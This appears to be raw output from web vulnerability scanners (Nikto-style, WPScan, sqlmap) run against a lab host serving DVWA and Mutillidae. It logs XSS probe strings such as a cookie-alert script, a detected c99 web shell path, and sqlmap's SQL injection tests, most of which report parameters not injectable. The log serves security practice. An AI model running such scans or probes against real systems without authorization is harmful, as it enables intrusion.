+ OSVDB-3268: /doc/: Directory indexing found. | |
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc. | |
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. | |
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. | |
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. | |
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. | |
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. | |
+ Server leaks inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 92462, size: 40540, mtime: Tue Dec 9 12:24:00 2008 | |
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. | |
+ OSVDB-3268: /test/: Directory indexing found. | |
+ OSVDB-3092: /test/: This might be interesting... | |
+ /phpinfo.php: Output from the phpinfo() function was found. | |
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. | |
+ OSVDB-3268: /icons/: Directory indexing found. | |
+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found. | |
+ /phpinfo.php?cx[]=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<script>alert(foo)</script>: Output from the phpinfo() function was found. | |
+ OSVDB-3233: /icons/README: Apache default file found. | |
+ /phpMyAdmin/: phpMyAdmin directory found | |
+ OSVDB-3092: /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. | |
+ /c99.php: c99.php remote web shell | |
+ 8347 requests: 0 error(s) and 30 item(s) reported on remote host | |
+ End Time: 2015-09-06 17:29:24 (GMT-4) (25 seconds) | |
--------------------------------------------------------------------------- | |
+ 1 host(s) tested | |
_______________________________________________________________ | |
__ _______ _____ | |
\ \ / / __ \ / ____| | |
\ \ /\ / /| |__) | (___ ___ __ _ _ __ | |
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ | |
\ /\ / | | ____) | (__| (_| | | | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| | |
WordPress Security Scanner by the WPScan Team | |
Version 2.8 | |
Sponsored by Sucuri - https://sucuri.net | |
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_ | |
_______________________________________________________________ | |
[!] [!] The remote website is up, but does not seem to be running WordPress. | |
python: can't open file 'CMSmap/cmsmap.py': [Errno 2] No such file or directory | |
_ | |
___ ___| |_____ ___ ___ {1.0-dev-7acddbf} | |
|_ -| . | | | .'| . | | |
|___|_ |_|_|_|_|__,| _| | |
|_| |_| http://sqlmap.org | |
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program | |
[*] starting at 17:29:26 | |
do you want to check for the existence of site's sitemap(.xml) [y/N] n | |
[17:29:26] [INFO] starting crawler | |
[17:29:26] [INFO] searching for links with depth 1 | |
[17:29:26] [INFO] heuristics detected web page charset 'ascii' | |
[17:29:26] [INFO] searching for links with depth 2 | |
please enter number of threads? [Enter for 1 (current)] 1 | |
[17:29:26] [WARNING] running in a single-thread mode. This could take a while | |
[17:29:26] [INFO] 2/5 links visited (40%) | |
sqlmap got a 302 redirect to 'http://192.168.1.113:80/dvwa/login.php'. Do you want to follow? [Y/n] Y | |
[17:29:27] [INFO] searching for links with depth 3 | |
please enter number of threads? [Enter for 1 (current)] 1 | |
[17:29:27] [WARNING] running in a single-thread mode. This could take a while | |
[17:29:27] [INFO] 1/58 links visited (2%) | |
[17:29:31] [INFO] heuristics detected web page charset 'ISO-8859-2' | |
[17:29:41] [INFO] searching for links with depth 4 | |
please enter number of threads? [Enter for 1 (current)] 1 | |
[17:29:41] [WARNING] running in a single-thread mode. This could take a while | |
[17:31:46] [INFO] 33/487 links visited (7%)1441575106952 addons.update-checker WARN Update manifest for {972ce4c6-7e08-4474-a285-3208198ce6fd} did not contain an updates property | |
[17:40:13] [INFO] 155/487 links visited (32%) | |
[17:59:53] [INFO] searching for links with depth 5 | |
please enter number of threads? [Enter for 1 (current)] 1 | |
[17:59:53] [WARNING] running in a single-thread mode. This could take a while | |
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N] N | |
[18:17:29] [INFO] sqlmap got a total of 4735 targets | |
URL 1: | |
GET http://192.168.1.113:80/dav/?C=N;O=D | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:17:29] [INFO] testing URL 'http://192.168.1.113:80/dav/?C=N;O=D' | |
[18:17:29] [INFO] using '/root/.sqlmap/output/results-09062015_0617pm.csv' as the CSV results file in multiple targets mode | |
[18:17:29] [INFO] testing connection to the target URL | |
[18:17:29] [INFO] testing if the target URL is stable | |
[18:17:30] [INFO] target URL is stable | |
[18:17:30] [INFO] testing if GET parameter 'C' is dynamic | |
[18:17:30] [WARNING] GET parameter 'C' does not appear dynamic | |
[18:17:30] [WARNING] heuristic (basic) test shows that GET parameter 'C' might not be injectable | |
[18:17:30] [INFO] testing for SQL injection on GET parameter 'C' | |
[18:17:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:17:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:17:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:17:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:17:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:17:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:17:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:17:31] [INFO] testing 'MySQL inline queries' | |
[18:17:31] [INFO] testing 'PostgreSQL inline queries' | |
[18:17:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:17:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:17:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:17:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:17:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:17:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:17:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:17:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:17:31] [INFO] testing 'Oracle AND time-based blind' | |
[18:17:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:17:31] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:17:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:17:32] [WARNING] GET parameter 'C' is not injectable | |
[18:17:32] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:17:32] [INFO] skipping 'http://192.168.1.113:80/dav/?C=M;O=A' | |
[18:17:32] [INFO] skipping 'http://192.168.1.113:80/dav/?C=S;O=A' | |
[18:17:32] [INFO] skipping 'http://192.168.1.113:80/dav/?C=D;O=A' | |
URL 2: | |
GET http://192.168.1.113:80/mutillidae/index.php?page=home.php | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:17:32] [INFO] testing URL 'http://192.168.1.113:80/mutillidae/index.php?page=home.php' | |
[18:17:32] [INFO] testing connection to the target URL | |
[18:17:32] [INFO] testing if the target URL is stable | |
[18:17:33] [INFO] target URL is stable | |
[18:17:33] [INFO] testing if GET parameter 'page' is dynamic | |
[18:17:33] [INFO] confirming that GET parameter 'page' is dynamic | |
[18:17:33] [INFO] GET parameter 'page' is dynamic | |
[18:17:33] [WARNING] heuristic (basic) test shows that GET parameter 'page' might not be injectable | |
[18:17:33] [INFO] heuristic (XSS) test shows that GET parameter 'page' might be vulnerable to XSS attacks | |
[18:17:33] [INFO] testing for SQL injection on GET parameter 'page' | |
[18:17:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:17:34] [WARNING] reflective value(s) found and filtering out | |
[18:17:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:17:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:17:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:17:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:17:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:17:37] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:17:37] [INFO] testing 'MySQL inline queries' | |
[18:17:37] [INFO] testing 'PostgreSQL inline queries' | |
[18:17:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:17:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:17:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:17:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:17:39] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:17:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:17:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:17:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:17:41] [INFO] testing 'Oracle AND time-based blind' | |
[18:17:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:17:41] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:17:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:17:54] [WARNING] GET parameter 'page' is not injectable | |
[18:17:54] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:17:54] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=login.php' | |
URL 3: | |
GET http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=home.php | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:17:54] [INFO] testing URL 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=home.php' | |
[18:17:54] [INFO] testing connection to the target URL | |
sqlmap got a 302 redirect to 'http://192.168.1.113:80/mutillidae/index.php'. Do you want to follow? [Y/n] Y | |
[18:17:55] [INFO] testing if the target URL is stable | |
[18:17:56] [WARNING] GET parameter 'do' does not appear dynamic | |
[18:17:56] [WARNING] heuristic (basic) test shows that GET parameter 'do' might not be injectable | |
[18:17:56] [INFO] testing for SQL injection on GET parameter 'do' | |
[18:17:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:17:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:17:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:17:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:17:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:17:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:17:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:17:59] [INFO] testing 'MySQL inline queries' | |
[18:17:59] [INFO] testing 'PostgreSQL inline queries' | |
[18:17:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:18:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:18:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:18:00] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:18:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:18:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:18:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:18:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:18:03] [INFO] testing 'Oracle AND time-based blind' | |
[18:18:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:18:03] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:18:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:18:16] [WARNING] GET parameter 'do' is not injectable | |
[18:18:16] [INFO] skipping previously processed GET parameter 'page' | |
[18:18:16] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:18:16] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=home.php' | |
[18:18:16] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=show-log.php' | |
[18:18:16] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=captured-data.php' | |
[18:18:16] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=credits.php' | |
[18:18:16] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=user-info.php' | |
[18:18:16] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=register.php' | |
[18:18:16] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=view-someones-blog.php' | |
URL 4: | |
GET http://192.168.1.113:80/mutillidae/?page=add-to-your-blog.php | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:18:16] [INFO] testing URL 'http://192.168.1.113:80/mutillidae/?page=add-to-your-blog.php' | |
[18:18:16] [INFO] testing connection to the target URL | |
[18:18:16] [INFO] testing if the target URL is stable | |
[18:18:17] [INFO] target URL is stable | |
[18:18:17] [INFO] testing if GET parameter 'page' is dynamic | |
[18:18:17] [INFO] confirming that GET parameter 'page' is dynamic | |
[18:18:17] [INFO] GET parameter 'page' is dynamic | |
[18:18:17] [WARNING] heuristic (basic) test shows that GET parameter 'page' might not be injectable | |
[18:18:17] [INFO] heuristic (XSS) test shows that GET parameter 'page' might be vulnerable to XSS attacks | |
[18:18:17] [INFO] testing for SQL injection on GET parameter 'page' | |
[18:18:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:18:18] [WARNING] reflective value(s) found and filtering out | |
[18:18:19] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:18:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:18:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:18:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:18:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:18:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:18:21] [INFO] testing 'MySQL inline queries' | |
[18:18:21] [INFO] testing 'PostgreSQL inline queries' | |
[18:18:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:18:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:18:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:18:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:18:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:18:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:18:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:18:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:18:25] [INFO] testing 'Oracle AND time-based blind' | |
[18:18:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:18:25] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:18:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:18:38] [WARNING] GET parameter 'page' is not injectable | |
[18:18:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:18:38] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=site-footer-xss-discussion.php' | |
[18:18:38] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=html5-storage.php' | |
[18:18:38] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=capture-data.php' | |
[18:18:38] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=dns-lookup.php' | |
URL 5: | |
GET http://192.168.1.113:80/mutillidae/index.php?page=password-generator.php&username=anonymous | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:18:38] [INFO] testing URL 'http://192.168.1.113:80/mutillidae/index.php?page=password-generator.php&username=anonymous' | |
[18:18:38] [INFO] testing connection to the target URL | |
[18:18:38] [INFO] testing if the target URL is stable | |
[18:18:39] [INFO] target URL is stable | |
[18:18:39] [INFO] skipping previously processed GET parameter 'page' | |
[18:18:39] [INFO] testing if GET parameter 'username' is dynamic | |
[18:18:39] [WARNING] GET parameter 'username' does not appear dynamic | |
[18:18:39] [WARNING] heuristic (basic) test shows that GET parameter 'username' might not be injectable | |
[18:18:39] [INFO] heuristic (XSS) test shows that GET parameter 'username' might be vulnerable to XSS attacks | |
[18:18:39] [INFO] testing for SQL injection on GET parameter 'username' | |
[18:18:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:18:40] [WARNING] reflective value(s) found and filtering out | |
[18:18:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:18:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:18:42] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:18:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:18:43] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:18:43] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:18:43] [INFO] testing 'MySQL inline queries' | |
[18:18:44] [INFO] testing 'PostgreSQL inline queries' | |
[18:18:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:18:44] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:18:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:18:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:18:45] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:18:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:18:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:18:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:18:47] [INFO] testing 'Oracle AND time-based blind' | |
[18:18:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:18:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:18:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:19:00] [WARNING] GET parameter 'username' is not injectable | |
[18:19:00] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=user-poll.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=set-background-color.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=pen-test-tool-lookup.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?page=text-file-viewer.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=view-someones-blog.php' | |
[18:19:00] [INFO] skipping 'http://192.168.1.113:80/mutillidae/?page=show-log.php' | |
